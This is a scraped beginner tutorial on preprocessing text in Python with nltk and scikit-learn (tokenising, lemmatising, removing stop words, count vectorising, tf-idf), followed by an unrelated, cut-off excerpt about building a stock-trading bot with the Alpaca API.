[ { "code": null, "e": 520, "s": 171, "text": "Welcome to Introduction to NLP! This is the first part of the 5-part series of posts. This post will show one way to preprocess text using an approach called bag-of-words where each text is represented by its words regardless of the order in which they are presented or the embedded grammar. We will complete the following steps when preprocessing:" }, { "code": null, "e": 604, "s": 520, "text": "TokeniseNormaliseRemove stop wordsCount vectoriseTransform to tf-idf representation" }, { "code": null, "e": 613, "s": 604, "text": "Tokenise" }, { "code": null, "e": 623, "s": 613, "text": "Normalise" }, { "code": null, "e": 641, "s": 623, "text": "Remove stop words" }, { "code": null, "e": 657, "s": 641, "text": "Count vectorise" }, { "code": null, "e": 692, "s": 657, "text": "Transform to tf-idf representation" }, { "code": null, "e": 817, "s": 692, "text": "💤 Do these terms look like gibberish to you? Don’t worry, they will no longer be by the time you finish reading this post! 🎓" }, { "code": null, "e": 1029, "s": 817, "text": "I assume the reader (👀 yes, you!) has access to and is familiar with Python including installing packages, defining functions and other basic tasks. If you are new to Python, this is a good place to get started." }, { "code": null, "e": 1145, "s": 1029, "text": "I have used and tested the scripts in Python 3.7.1. Let’s make sure you have the right tools before we get started." }, { "code": null, "e": 1202, "s": 1145, "text": "We will use the following powerful third party packages:" }, { "code": null, "e": 1233, "s": 1202, "text": "pandas: Data analysis library," }, { "code": null, "e": 1277, "s": 1233, "text": "nltk: Natural Language Tool Kit library and" }, { "code": null, "e": 1312, "s": 1277, "text": "sklearn: Machine Learning library." }, { "code": null, "e": 1453, "s": 1312, "text": "The script below can help you download these corpora. If you have already downloaded, running this will notify you that they are up-to-date:" }, { "code": null, "e": 1516, "s": 1453, "text": "import nltknltk.download('stopwords') nltk.download('wordnet')" }, { "code": null, "e": 1743, "s": 1516, "text": "To keep things manageable, we will use tiny text data which will allow us to monitor inputs and outputs for each step. For this data, I have chosen Joey’s draft speech for Chandler and Monica’s wedding from the sitcom Friends." }, { "code": null, "e": 1760, "s": 1743, "text": "His speech goes:" }, { "code": null, "e": 2298, "s": 1760, "text": "part1 = \"\"\"We are gathered here today on this joyous occasion to celebrate the special love that Monica and Chandler share. It is a love based on giving and receiving as well as having and sharing. And the love that they give and have is shared and received. Andthrough this having and giving and sharing and receiving, we too can share and love and have... and receive.\"\"\"part2 = \"\"\"When I think of the love these two givers and receivers share I cannot help but envy the lifetime ahead of having and loving and giving and receiving.\"\"\"" }, { "code": null, "e": 2644, "s": 2298, "text": "If you haven’t seen the part I am referring, there are short videos available on YouTube (keywords: Joey’s wedding speech). I think Joey’s acting and Monica and Chandler’s reaction definitely makes this speech much funnier than the mere text. Writing this post gave me a nice excuse to watch the scene repeatedly and I can’t have enough of it. 
🙈" }, { "code": null, "e": 2707, "s": 2644, "text": "Firstly, let’s prepare the environment with packages and data:" }, { "code": null, "e": 3006, "s": 2707, "text": "# Import packages and modulesimport pandas as pdfrom nltk.stem import WordNetLemmatizerfrom nltk.tokenize import RegexpTokenizerfrom nltk.corpus import stopwordsfrom sklearn.feature_extraction.text import TfidfVectorizer# Create a dataframeX_train = pd.DataFrame([part1, part2], columns=['speech'])" }, { "code": null, "e": 3093, "s": 3006, "text": "Secondly, let’s define a text preprocessing function to pass it on to TfidfVectorizer:" }, { "code": null, "e": 3521, "s": 3093, "text": "def preprocess_text(text): # Tokenise words while ignoring punctuation tokeniser = RegexpTokenizer(r'\\w+') tokens = tokeniser.tokenize(text) # Lowercase and lemmatise lemmatiser = WordNetLemmatizer() lemmas = [lemmatiser.lemmatize(token.lower(), pos='v') for token in tokens] # Remove stopwords keywords= [lemma for lemma in lemmas if lemma not in stopwords.words('english')] return keywords" }, { "code": null, "e": 3604, "s": 3521, "text": "Lastly, let’s preprocess the text data by leveraging the function defined earlier:" }, { "code": null, "e": 4130, "s": 3604, "text": "# Create an instance of TfidfVectorizervectoriser = TfidfVectorizer(analyzer=preprocess_text)# Fit to the data and transform to feature matrixX_train = vectoriser.fit_transform(X_train['speech'])# Convert sparse matrix to dataframeX_train = pd.DataFrame.sparse.from_spmatrix(X_train)# Save mapping on which index refers to which wordscol_map = {v:k for k, v in vectoriser.vocabulary_.items()}# Rename each column using the mappingfor col in X_train.columns: X_train.rename(columns={col: col_map[col]}, inplace=True)X_train" }, { "code": null, "e": 4353, "s": 4130, "text": "Ta-da❕ We have preprocessed text into feature matrix. Do these scripts make much sense without any explanation? Let’s break this down and understand the 5 steps mentioned at the beginning with examples in the next section." }, { "code": null, "e": 4564, "s": 4353, "text": "💡 “Given a character sequence and a defined document unit, tokenization is the task of chopping it up into pieces, called tokens, perhaps at the same time throwing away certain characters, such as punctuation.”" }, { "code": null, "e": 4779, "s": 4564, "text": "In this step, we will convert a string part1 into list of tokens while discarding punctuation. There are many ways we could accomplish this task. I will show you one way to do so by using RegexpTokenizer from nltk:" }, { "code": null, "e": 5006, "s": 4779, "text": "# Import modulefrom nltk.tokenize import RegexpTokenizer# Create an instance of RegexpTokenizer for alphanumeric tokenstokeniser = RegexpTokenizer(r'\\w+')# Tokenise 'part1' stringtokens = tokeniser.tokenize(part1)print(tokens)" }, { "code": null, "e": 5042, "s": 5006, "text": "Let’s inspect how tokens look like:" }, { "code": null, "e": 5321, "s": 5042, "text": "We see that each word is now a separate string. Do you notice how there are variations of the same word? For instance: words can differ in terms of their case: ‘and’ and ‘And’ or their suffix: ‘share’, ‘shared’ and ‘sharing’. This is where normalisation comes in to standardise." }, { "code": null, "e": 5382, "s": 5321, "text": "💡 To normalise a word is to transform it into its root form." }, { "code": null, "e": 5602, "s": 5382, "text": "Stemming and lemmatisation are popular ways to normalise text. 
In this step, we will use lemmatisation to transform words to their dictionary form as well as remove case distinction by converting all words to lowercase." }, { "code": null, "e": 5721, "s": 5602, "text": "🔗 If you want to learn more about stemming and lemmatisation, you may want to check out the second part of the series." }, { "code": null, "e": 5786, "s": 5721, "text": "We will use WordNetLemmatizer from nltk to lemmatise our tokens:" }, { "code": null, "e": 6034, "s": 5786, "text": "# Import modulefrom nltk.stem import WordNetLemmatizer# Create an instance of WordNetLemmatizerlemmatiser = WordNetLemmatizer()# Lowercase and lemmatise tokenslemmas = [lemmatiser.lemmatize(token.lower(), pos='v') for token in tokens]print(lemmas)" }, { "code": null, "e": 6160, "s": 6034, "text": "The words are now transformed to its dictionary form. For instance, ‘share’, ‘sharing’ and ‘shared’ are now all just ‘share’." }, { "code": null, "e": 6202, "s": 6160, "text": "# Check how many words we havelen(lemmas)" }, { "code": null, "e": 6426, "s": 6202, "text": "We have 66 words but not all words carry the same level of contribution to the meaning of the text. In other words, there are some words that are not particularly useful to the key message. This is where stop words come in." }, { "code": null, "e": 6517, "s": 6426, "text": "💡 Stop words are common words which provide little to no value to the meaning of the text." }, { "code": null, "e": 6828, "s": 6517, "text": "Think about this: If you had to describe yourself in three words as elaborately as possible, would you include ‘I’, or ‘am’? If I asked you to underline keywords in Joey’s speech, would you underline ‘a’ or ‘the’? Probably not. The ‘I’, ‘am’, ‘a’ and ‘the’ are examples of stop words. I think you get the idea." }, { "code": null, "e": 7128, "s": 6828, "text": "Different sets of stop words may be necessary depending on the domain that the text is related to. In this step, we will leverage nltk’s stopwords corpus. You could define your own set of stop words or enrich standard stop words by adding common terms that are appropriate to the domain of the text." }, { "code": null, "e": 7194, "s": 7128, "text": "Let’s first familiarise ourselves with stopwords little bit more:" }, { "code": null, "e": 7377, "s": 7194, "text": "# Import modulefrom nltk.corpus import stopwords# Check out how many stop words there are print(len(stopwords.words('english')))# See first 5 stop wordsstopwords.words('english')[:5]" }, { "code": null, "e": 7619, "s": 7377, "text": "At the time of writing this post, there are 179 english stop words in the nltk’s stopword corpus. Some examples include: ‘i’, ‘me’, ‘my’, ‘myself’, ‘we’. If you are curious to see the full list, simply remove [:5] from the last line of code." }, { "code": null, "e": 7793, "s": 7619, "text": "Notice how these stop words are in lowercase? To effectively remove stop words, we have to ensure that all words are in lowercase. Here, we have already done so in step two." }, { "code": null, "e": 7864, "s": 7793, "text": "Using a list comprehension, let’s remove all stop words from our list:" }, { "code": null, "e": 7961, "s": 7864, "text": "keywords = [lemma for lemma in lemmas if lemma not in stopwords.words('english')]print(keywords)" }, { "code": null, "e": 8005, "s": 7961, "text": "# Check how many words we havelen(keywords)" }, { "code": null, "e": 8104, "s": 8005, "text": "After removing stop words, we only have 26 words as opposed to 66 yet the gist is still preserved." 
}, { "code": null, "e": 8303, "s": 8104, "text": "Now, if you scroll back up to section 2 (Final Code) and have a quick look at the preprocess_text function, you will see that this function captures the transformation process shown in steps 1 to 3." }, { "code": null, "e": 8395, "s": 8303, "text": "💡 Count vectorise is to convert a collection of text documents to a matrix of token counts." }, { "code": null, "e": 8458, "s": 8395, "text": "Now let’s look at counts of each word in keywords from step 3:" }, { "code": null, "e": 8513, "s": 8458, "text": "{word: keywords.count(word) for word in set(keywords)}" }, { "code": null, "e": 8581, "s": 8513, "text": "The word ‘give’ occurs 3 times whereas ‘joyous’ was mentioned once." }, { "code": null, "e": 8871, "s": 8581, "text": "This is essentially what CountVectorizer does to all records. CountVectorizer transforms text into a matrix of m by n where m is the number of text records, n is the number of unique tokens across all records and the elements of the matrix refer to the tally of a token for a given record." }, { "code": null, "e": 9003, "s": 8871, "text": "In this step, we will convert our text dataframe to count matrix. We will pass our custom preprocessor function to CountVectorizer:" }, { "code": null, "e": 9274, "s": 9003, "text": "# Import modulefrom sklearn.feature_extraction.text import CountVectorizer# Create an instance of CountfVectorizervectoriser = CountVectorizer(analyzer=preprocess_text)# Fit to the data and transform to feature matrixX_train = vectoriser.fit_transform(X_train['speech'])" }, { "code": null, "e": 9414, "s": 9274, "text": "The output feature matrix will be in sparse_matrix form. Let’s convert it to a dataframe with proper column names to make it more readible:" }, { "code": null, "e": 9745, "s": 9414, "text": "# Convert sparse matrix to dataframeX_train = pd.DataFrame.sparse.from_spmatrix(X_train)# Save mapping on which index refers to which termscol_map = {v:k for k, v in vectoriser.vocabulary_.items()}# Rename each column using the mappingfor col in X_train.columns: X_train.rename(columns={col: col_map[col]}, inplace=True)X_train" }, { "code": null, "e": 9945, "s": 9745, "text": "Once we transform it to dataframe, the columns would be just indices (i.e. numbers from 0 to n-1) instead of the actual words. Therefore, we need to rename the columns to make it easier to interpret." }, { "code": null, "e": 10239, "s": 9945, "text": "When the vectoriser is fit to the data, we can find out the index mapping to words from vectoriser.vocabulary_. This index mapping is formatted as {word:index}. To rename columns, we must switch the key-value pairs to {index:word}. This is done in the second line of code and saved in col_map." }, { "code": null, "e": 10439, "s": 10239, "text": "Using for loop at the end of the code, we are renaming each column using the mapping, and the output should look like what is in the table above (showing only partial output due to space limitation)." }, { "code": null, "e": 10558, "s": 10439, "text": "From this matrix, we can see ‘give’ has been mentioned 3 times in part1 (row index=0) and once in part2 (row index=1)." }, { "code": null, "e": 11223, "s": 10558, "text": "In our example, we only have 2 records each consisting of only a handful of sentences, so the count matrix is pretty small and its sparsity is not as high. Sparsity refers to the proportion of zero elements among all elements in a matrix. 
When you are working on real data with hundreds, thousands or even millions of records each represented by rich text, the count matrix is likely to be extremely large and contain mostly 0s. In those instances, using sparse format saves storage memory and speeds up further processing. As a result, you may not always convert sparse matrix to a dataframe like we did here for illustration when preprocessing text in real life." }, { "code": null, "e": 11286, "s": 11223, "text": "💡 tf-idf stands for term frequency inverse document frequency." }, { "code": null, "e": 11534, "s": 11286, "text": "When transforming to tf-idf representation, we are transforming the counts to weighted frequency where we give more significance to less frequent words and less importance to more frequent words by using a weight called inverse document frequency." }, { "code": null, "e": 11672, "s": 11534, "text": "🔗 I have dedicated a separate post to explain this in detail in the third part of the series because I think it deserves its own section." }, { "code": null, "e": 11961, "s": 11672, "text": "# Import modulefrom sklearn.feature_extraction.text import TfidfTransformer# Create an instance of TfidfTransformertransformer = TfidfTransformer()# Fit to the data and transform to tf-idfX_train = pd.DataFrame(transformer.fit_transform(X_train).toarray(), columns=X_train.columns)X_train" }, { "code": null, "e": 12039, "s": 11961, "text": "In the last step, we ensured that output is still a properly named dataframe:" }, { "code": null, "e": 12247, "s": 12039, "text": "Now that we understand step 4 and step 5 individually, I would like to point out that there is a more efficient way to complete steps 4 and 5 using TfidfVectorizer. Such is accomplished using the code below:" }, { "code": null, "e": 12509, "s": 12247, "text": "# Import modulefrom sklearn.feature_extraction.text import TfidfVectorizer# Create an instance of TfidfVectorizervectoriser = TfidfVectorizer(analyzer=preprocess_text)# Fit to the data and transform to tf-idfX_train = vectoriser.fit_transform(X_train['speech'])" }, { "code": null, "e": 12643, "s": 12509, "text": "To make this sparse matrix output into a dataframe with relevant column names, you know what to do (hint: see what we did in step 4)." }, { "code": null, "e": 12790, "s": 12643, "text": "Having covered all steps, if you go back to the scripts in section 2 (Final Code) again, does it look more familiar than the first time you saw? 👀" }, { "code": null, "e": 13014, "s": 12790, "text": "Would you like to access more content like this? Medium members get unlimited access to any articles on Medium. If you become a member using my referral link, a portion of your membership fee will directly go to support me." }, { "code": null, "e": 13461, "s": 13014, "text": "Thank you for taking the time to go through this post. I hope that you learned something from reading it. Links to the rest of the posts are collated below:◼️ Part 1: Preprocessing text in Python◼️ Part 2: Difference between lemmatisation and stemming◼️ Part 3: TF-IDF explained◼️ Part 4: Supervised text classification model in Python◼️ Part 5A: Unsupervised topic model in Python (sklearn)◼️ Part 5B: Unsupervised topic model in Python (gensim)" }, { "code": null, "e": 13497, "s": 13461, "text": "Happy preprocessing! Bye for now 🏃💨" }, { "code": null, "e": 13634, "s": 13497, "text": "Christopher D. 
Manning, Prabhakar Raghavan and Hinrich Schütze, Introduction to Information Retrieval, Cambridge University Press, 2008" }, { "code": null, "e": 13743, "s": 13634, "text": "Bird, Steven, Edward Loper and Ewan Klein, Natural Language Processing with Python. O’Reilly Media Inc, 2009" } ]
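Following up on the hint at the end of the preprocessing write-up above (turning the TfidfVectorizer sparse output into a dataframe with word column names), here is a minimal sketch. It simply repeats the step-4 recipe from the article; the variable names X_train and vectoriser are the article's own, and the rest is an assumption-free restatement of that recipe:
# convert the tf-idf sparse matrix to a dataframe with word column names
import pandas as pd
X_train = pd.DataFrame.sparse.from_spmatrix(X_train)
# vectoriser.vocabulary_ maps word -> column index; invert it to index -> word
col_map = {v: k for k, v in vectoriser.vocabulary_.items()}
X_train = X_train.rename(columns=col_map)
print(X_train.head())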
How can we detect an event when the mouse moves over any component in Java?
We can implement the MouseListener interface to handle mouse events. A MouseEvent is fired when we press, release or click (press followed by release) a mouse button (left or right button) at the source object, or position the mouse pointer at (enter) and away (exit) from the source object. We can detect a mouse event when the mouse moves over any component, such as a label, by using the mouseEntered() method, and detect when it leaves by using the mouseExited() method of the MouseAdapter class or MouseListener interface. import java.awt.*; import java.awt.event.*; import javax.swing.*; public class MouseOverTest extends JFrame { private JLabel label; public MouseOverTest() { setTitle("MouseOver Test"); setLayout(new FlowLayout()); label = new JLabel("Move the mouse over this JLabel"); label.setOpaque(true); add(label); label.addMouseListener(new MouseAdapter() { public void mouseEntered(MouseEvent evt) { Color c = label.getBackground(); // When the mouse moves over the label, swap the background and foreground colors. label.setBackground(label.getForeground()); label.setForeground(c); } public void mouseExited(MouseEvent evt) { Color c = label.getBackground(); label.setBackground(label.getForeground()); label.setForeground(c); } }); setSize(400, 275); setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); setLocationRelativeTo(null); setVisible(true); } public static void main(String[] args) { new MouseOverTest(); } }
[ { "code": null, "e": 1605, "s": 1062, "text": "We can implement a MouseListener interface when the mouse is stable while handling the mouse event. A MouseEvent is fired when we can press, release or click (press followed by release) a mouse button (left or right button) at the source object or position the mouse pointer at (enter) and away (exit) from the source object. We can detect a mouse event when the mouse moves over any component such as a label by using the mouseEntered() method and can be exited by using mouseExited() method of MouseAdapter class or MouseListener interface." }, { "code": null, "e": 2699, "s": 1605, "text": "import java.awt.*;\nimport java.awt.event.*;\nimport javax.swing.*;\npublic class MouseOverTest extends JFrame {\n private JLabel label;\n public MouseOverTest() {\n setTitle(\"MouseOver Test\");\n setLayout(new FlowLayout());\n label = new JLabel(\"Move the mouse moves over this JLabel\");\n label.setOpaque(true);\n add(label);\n label.addMouseListener(new MouseAdapter() {\n public void mouseEntered(MouseEvent evt) {\n Color c = label.getBackground(); // When the mouse moves over a label, the background color changed.\n label.setBackground(label.getForeground());\n label.setForeground(c);\n }\n public void mouseExited(MouseEvent evt) {\n Color c = label.getBackground();\n label.setBackground(label.getForeground());\n label.setForeground(c);\n }\n });\n setSize(400, 275);\n setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n setLocationRelativeTo(null);\n setVisible(true);\n }\n public static void main(String[] args) {\n new MouseOverTest();\n }\n}" } ]
Adding Firebase to Android App - GeeksforGeeks
18 Oct, 2021 There are various services offered online such as storage, online processing, realtime databases, user authorisation, etc. Google developed a platform called Firebase that provides all these online services. It also gives a daily analysis of the usage of these services along with details of the users using them. To simplify, it can be said that Firebase is a mobile and web application development platform. It provides services that a web application or mobile application might require. Anyone can easily include Firebase in their application, and it will make their online work much easier than it used to be. There are two ways to add Firebase to any Android app: Below are the steps to include Firebase in an Android project in Android Studio: Update Android Studio (>= 2.2). Create a new project in Firebase by clicking on the Add project. Now open Android Studio and click on Tools in the upper left corner. Now click on the Firebase option in the drop down menu. A menu will appear on the right side of the screen. It will show various services that Firebase offers. Choose the desired service. Now click on the Connect to Firebase option in the menu of the desired service. Add the dependencies of your service by clicking on the Add [YOUR SERVICE NAME] to the app option. (In the image below, the Firebase cloud messaging service is chosen) In this, the steps involve:
Create a Firebase project: Create a project by clicking on Create project in the Firebase console. Fill in the necessary details in the pop up window about the project. Edit the project ID if required. Click on Create project to finally create it. Now add this project to the Android app: Click on the Add Firebase to your Android app option on the starting window. A prompt will open where you enter the package name of the app. Now the app is connected to Firebase, and all the cloud based as well as server based services can be easily used in the app. Now the app will be registered with Firebase. Also, the SHA1 certificate of the app can be obtained by following these steps: Go to android studio project ↳ gradle ↳ root folder ↳ Tasks ↳ Android ↳ signingReport ↳ copy paste SHA1 from console Now download the google-services.json file and place it in the root directory of the Android app. Now add the following in the project. Adding the sdk in the project: Add the following code to the PROJECT-LEVEL build.gradle of the app. buildscript { dependencies { classpath 'com.google.gms:google-services:4.0.0' }} Add the following code to the APP-LEVEL build.gradle of the app. dependencies { compile 'com.google.firebase:firebase-core:16.0.0' } ... // Add to the bottom of the file apply plugin: 'com.google.gms.google-services' Now sync the Gradle by clicking on Sync now. After adding the above code (sdk), run the app to send the verification to the Firebase console. Firebase is now successfully installed.
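(One hedged aside, not part of the original steps: on a standard Android Gradle setup, the signingReport task used above to obtain the SHA1 certificate can usually also be run from a terminal at the project root as ./gradlew signingReport, which prints the SHA1 straight to the console.)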
[ { "code": null, "e": 25296, "s": 25268, "text": "\n18 Oct, 2021" }, { "code": null, "e": 25603, "s": 25296, "text": "There are various services offered online such as storage, online processing, realtime database, authorisation of user etc. Google developed a platform called Firebase that provide all these online services. It also gives a daily analysis of usage of these services along with the details of user using it." }, { "code": null, "e": 25906, "s": 25603, "text": "To simplify, it can be said that Firebase is a mobile and web application development platform. It provides services that a web application or mobile application might require. Anyone can easily include firebase to there application and it will make their online work way easier than it was used to be." }, { "code": null, "e": 25961, "s": 25906, "text": "There are two ways to add firebase to any Android app:" }, { "code": null, "e": 26039, "s": 25961, "text": "Below are the steps to include Firebase to Android project in Android studio:" }, { "code": null, "e": 26638, "s": 26039, "text": "Update the android studio (>= 2.2)Create a new project in the firebase by clicking on the Add project.Now open the android studio and click on Tools in the upper left corner.Now click on the Firebase option in the drop down menu.A menu will appear on the right side of screen. It will show various services that Firebase offers. Choose the desired service.Now Click on the Connect to Firebase option in the menu of desired service.Add the dependencies of your service by clicking on the Add [YOUR SERVICE NAME] to the app option. (In the image below, the Firebase cloud messaging service is chosen)" }, { "code": null, "e": 26673, "s": 26638, "text": "Update the android studio (>= 2.2)" }, { "code": null, "e": 26742, "s": 26673, "text": "Create a new project in the firebase by clicking on the Add project." }, { "code": null, "e": 26815, "s": 26742, "text": "Now open the android studio and click on Tools in the upper left corner." }, { "code": null, "e": 26871, "s": 26815, "text": "Now click on the Firebase option in the drop down menu." }, { "code": null, "e": 26999, "s": 26871, "text": "A menu will appear on the right side of screen. It will show various services that Firebase offers. Choose the desired service." }, { "code": null, "e": 27075, "s": 26999, "text": "Now Click on the Connect to Firebase option in the menu of desired service." }, { "code": null, "e": 27243, "s": 27075, "text": "Add the dependencies of your service by clicking on the Add [YOUR SERVICE NAME] to the app option. (In the image below, the Firebase cloud messaging service is chosen)" }, { "code": null, "e": 27271, "s": 27243, "text": "In this, the steps involve:" }, { "code": null, "e": 28747, "s": 27271, "text": "Create a firebase projectCreate a project by clicking on create project in the firebase console.Fill the necessary details in the pop up window about the project. Edit the project ID if required.Click on create project to finally create it.Now add this project to the android appClick on the Add firebase to your android app option on the starting window.A prompt will open where to enter the package name of the app.Now the app is connected to the Firebase. 
Now all the cloud based as well server based services can be easily used in the app.Now the app will be registered with firebase.Also, the SHA1 certificate, can be given, of the app by following steps:Go to android studio project\n ↳ gradle\n ↳ root folder\n ↳ Tasks\n ↳ Android\n ↳ signingReport\n ↳ copy paste SHA1 from consoleNow download the google-services.json file and place it in the root directory of the android app.Now add the following in the project.Adding the sdk in the project.Add the following code to the PROJECT-LEVELbuild.gradle of the app.buildscript { dependencies { classpath 'com.google.gms:google-services:4.0.0' }}Add the following code to APP-LEVEL build.gradle of the app.dependencies { compile 'com.google.firebase:firebase-core:16.0.0'}...// Add to the bottom of the fileapply plugin: 'com.google.gms.google-services'Now Sync the gradle by clicking on sync now.After adding the above code(sdk), run the app to send the verification to the Firebase console." }, { "code": null, "e": 28988, "s": 28747, "text": "Create a firebase projectCreate a project by clicking on create project in the firebase console.Fill the necessary details in the pop up window about the project. Edit the project ID if required.Click on create project to finally create it." }, { "code": null, "e": 29060, "s": 28988, "text": "Create a project by clicking on create project in the firebase console." }, { "code": null, "e": 29160, "s": 29060, "text": "Fill the necessary details in the pop up window about the project. Edit the project ID if required." }, { "code": null, "e": 29206, "s": 29160, "text": "Click on create project to finally create it." }, { "code": null, "e": 29555, "s": 29206, "text": "Now add this project to the android appClick on the Add firebase to your android app option on the starting window.A prompt will open where to enter the package name of the app.Now the app is connected to the Firebase. Now all the cloud based as well server based services can be easily used in the app.Now the app will be registered with firebase." }, { "code": null, "e": 29632, "s": 29555, "text": "Click on the Add firebase to your android app option on the starting window." }, { "code": null, "e": 29695, "s": 29632, "text": "A prompt will open where to enter the package name of the app." }, { "code": null, "e": 29822, "s": 29695, "text": "Now the app is connected to the Firebase. Now all the cloud based as well server based services can be easily used in the app." }, { "code": null, "e": 29868, "s": 29822, "text": "Now the app will be registered with firebase." }, { "code": null, "e": 30093, "s": 29868, "text": "Also, the SHA1 certificate, can be given, of the app by following steps:Go to android studio project\n ↳ gradle\n ↳ root folder\n ↳ Tasks\n ↳ Android\n ↳ signingReport\n ↳ copy paste SHA1 from console" }, { "code": null, "e": 30246, "s": 30093, "text": "Go to android studio project\n ↳ gradle\n ↳ root folder\n ↳ Tasks\n ↳ Android\n ↳ signingReport\n ↳ copy paste SHA1 from console" }, { "code": null, "e": 30344, "s": 30246, "text": "Now download the google-services.json file and place it in the root directory of the android app." 
}, { "code": null, "e": 30772, "s": 30344, "text": "Now add the following in the project.Adding the sdk in the project.Add the following code to the PROJECT-LEVELbuild.gradle of the app.buildscript { dependencies { classpath 'com.google.gms:google-services:4.0.0' }}Add the following code to APP-LEVEL build.gradle of the app.dependencies { compile 'com.google.firebase:firebase-core:16.0.0'}...// Add to the bottom of the fileapply plugin: 'com.google.gms.google-services'" }, { "code": null, "e": 30955, "s": 30772, "text": "Adding the sdk in the project.Add the following code to the PROJECT-LEVELbuild.gradle of the app.buildscript { dependencies { classpath 'com.google.gms:google-services:4.0.0' }}" }, { "code": "buildscript { dependencies { classpath 'com.google.gms:google-services:4.0.0' }}", "e": 31041, "s": 30955, "text": null }, { "code": null, "e": 31250, "s": 31041, "text": "Add the following code to APP-LEVEL build.gradle of the app.dependencies { compile 'com.google.firebase:firebase-core:16.0.0'}...// Add to the bottom of the fileapply plugin: 'com.google.gms.google-services'" }, { "code": "dependencies { compile 'com.google.firebase:firebase-core:16.0.0'}...// Add to the bottom of the fileapply plugin: 'com.google.gms.google-services'", "e": 31399, "s": 31250, "text": null }, { "code": null, "e": 31444, "s": 31399, "text": "Now Sync the gradle by clicking on sync now." }, { "code": null, "e": 31540, "s": 31444, "text": "After adding the above code(sdk), run the app to send the verification to the Firebase console." }, { "code": null, "e": 31580, "s": 31540, "text": "Firebase is now successfully installed." }, { "code": null, "e": 31594, "s": 31580, "text": "sumitgumber28" }, { "code": null, "e": 31602, "s": 31594, "text": "android" }, { "code": null, "e": 31607, "s": 31602, "text": "Java" }, { "code": null, "e": 31612, "s": 31607, "text": "Java" }, { "code": null, "e": 31710, "s": 31612, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 31729, "s": 31710, "text": "Interfaces in Java" }, { "code": null, "e": 31747, "s": 31729, "text": "ArrayList in Java" }, { "code": null, "e": 31767, "s": 31747, "text": "Stack Class in Java" }, { "code": null, "e": 31782, "s": 31767, "text": "Stream In Java" }, { "code": null, "e": 31806, "s": 31782, "text": "Singleton Class in Java" }, { "code": null, "e": 31818, "s": 31806, "text": "Set in Java" }, { "code": null, "e": 31837, "s": 31818, "text": "Overriding in Java" }, { "code": null, "e": 31856, "s": 31837, "text": "LinkedList in Java" }, { "code": null, "e": 31876, "s": 31856, "text": "Collections in Java" } ]
How to find parent elements by python webdriver?
We can find parent elements with Selenium webdriver. First of all, we need to identify the child element with the help of any of the locators like id, class, name, xpath or css. Then we have to identify the parent element with the find_element_by_xpath() method. We can identify the parent from the child by locating the child and then passing (..) as a parameter to find_element_by_xpath(). Syntax: child.find_element_by_xpath("..") Let us identify the class attribute of the parent ul from the child element li in the HTML code below: The child element with class heading should be able to get the parent element having the toc chapters class attribute. from selenium import webdriver driver = webdriver.Chrome(executable_path="C:\\chromedriver.exe") driver.implicitly_wait(0.5) driver.get("https://www.tutorialspoint.com/about/about_careers.htm") # identify child element l = driver.find_element_by_xpath("//li[@class='heading']") # identify parent from child element with (..) in xpath t = l.find_element_by_xpath("..") # get_attribute() method to obtain class of parent print("Parent class attribute: " + t.get_attribute("class")) driver.close()
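As a side note beyond the original tutorial: the parent can also be fetched without XPath by executing a small piece of JavaScript, which can be handy when the child was located with a non-XPath locator. A minimal sketch, assuming the same driver and child element as above:
# locate the child as in the tutorial
child = driver.find_element_by_xpath("//li[@class='heading']")
# ask the browser for the DOM parent of the child element
parent = driver.execute_script("return arguments[0].parentNode;", child)
print(parent.get_attribute("class"))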
[ { "code": null, "e": 1319, "s": 1062, "text": "We can find parent elements with Selenium webdriver. First of all we need to identify the child element with help of any of the locators like id, class, name,xpath or css. Then we have to identify the parent element with the find_element_by_xpath() method." }, { "code": null, "e": 1463, "s": 1319, "text": "We can identify the parent from the child, by localizing it with the child and then passing (..) as a parameter to the find_element_by_xpath()." }, { "code": null, "e": 1471, "s": 1463, "text": "Syntax−" }, { "code": null, "e": 1505, "s": 1471, "text": "child.find_element_by_xpath(\"..\")" }, { "code": null, "e": 1596, "s": 1505, "text": "Let us identify class attribute of parent ul from the child element li in below html code−" }, { "code": null, "e": 1711, "s": 1596, "text": "The child element with class heading should be able to get the parent element having toc chapters class attribute." }, { "code": null, "e": 2203, "s": 1711, "text": "from selenium import webdriver\ndriver = webdriver.Chrome(executable_path=\"\nC:\\\\chromedriver.exe\")\ndriver.implicitly_wait(0.5)\ndriver.get(\"https://www.tutorialspoint.com/about/about_careers.htm\")\n#identify child element\nl= driver.find_element_by_xpath(\"//li[@class='heading']\")\n#identify parent from child element with (..) in xpath\nt= l.find_element_by_xpath(\"..\")\n# get_attribute() method to obtain class of parent\nprint(\"Parent class attribute: \" + t.get_attribute(\"class\"))\ndriver.close()" } ]
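One version caveat worth noting: the find_element_by_xpath() style of locator used above was deprecated in Selenium 4 in favour of the find_element(By.XPATH, ...) form, so on newer installs the same lookup would be written roughly as follows (a sketch, assuming Selenium 4+):
from selenium.webdriver.common.by import By

# same child/parent lookup with the Selenium 4 locator API
child = driver.find_element(By.XPATH, "//li[@class='heading']")
parent = child.find_element(By.XPATH, "..")
print(parent.get_attribute("class"))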
AI Stock Trading agent to predict stock prices | Towards Data Science
If you have followed the stock market recently, you would have noticed the wild swings due to COVID-19. It goes up one day and down the next, a pattern an AI might help predict. Won’t it be wonderful to have a stock trading agent with AI powers to buy and sell stocks without the need to monitor it hour by hour? So I decided to create a bot to trade. You would have seen many models that read from CSVs and create a neural network, LSTM, or deep reinforcement learning model (DRL). However, those models end up in a sandbox environment and are often tricky to use in a live environment. So I created an AI pipeline, which trades in real-time. After all, who does not want to make money in the stock market? So let’s get started. Below is the process we are going to follow to implement it. Alpaca Broker account Alpaca python package for API trading Collect data, EDA, feature engineering AI model and Training AWS Cloud to host code and get predictions Create a lambda function and API Trade stocks automatically Currently, most brokerage firms offer zero trading fees. However, not all brokerage firms have an API option to trade. Alpaca provides commission-free trading with a Python API. Once you create an account, you will have paper trading and live trading options. We can test the strategies in paper trading and implement them in live trading. Switching to live trading is just a key change. If you have a local environment, you can install the pip package. Once installed, you can select Paper trading or Live trading. Based on your selection, you can get the API and secret key. Now, these keys will be used in our code. import alpaca_trade_api as tradeapi api = tradeapi.REST('xxxxxxxx', 'xxxxxxxxxx', base_url='https://paper-api.alpaca.markets', api_version='v2',) Getting Data One advantage of using Alpaca is that you can get historical data from the Polygon API. The timeframe can be minute, hour, day, etc. Once you create the data frame, the chart should look something like this. Feature Engineering Like any data science project, we need to create features related to the dataset. Parts of the implementation were adapted from this article. I have built around 430+ technical indicators from the above dataset. Features include momentum, trends, volatility, 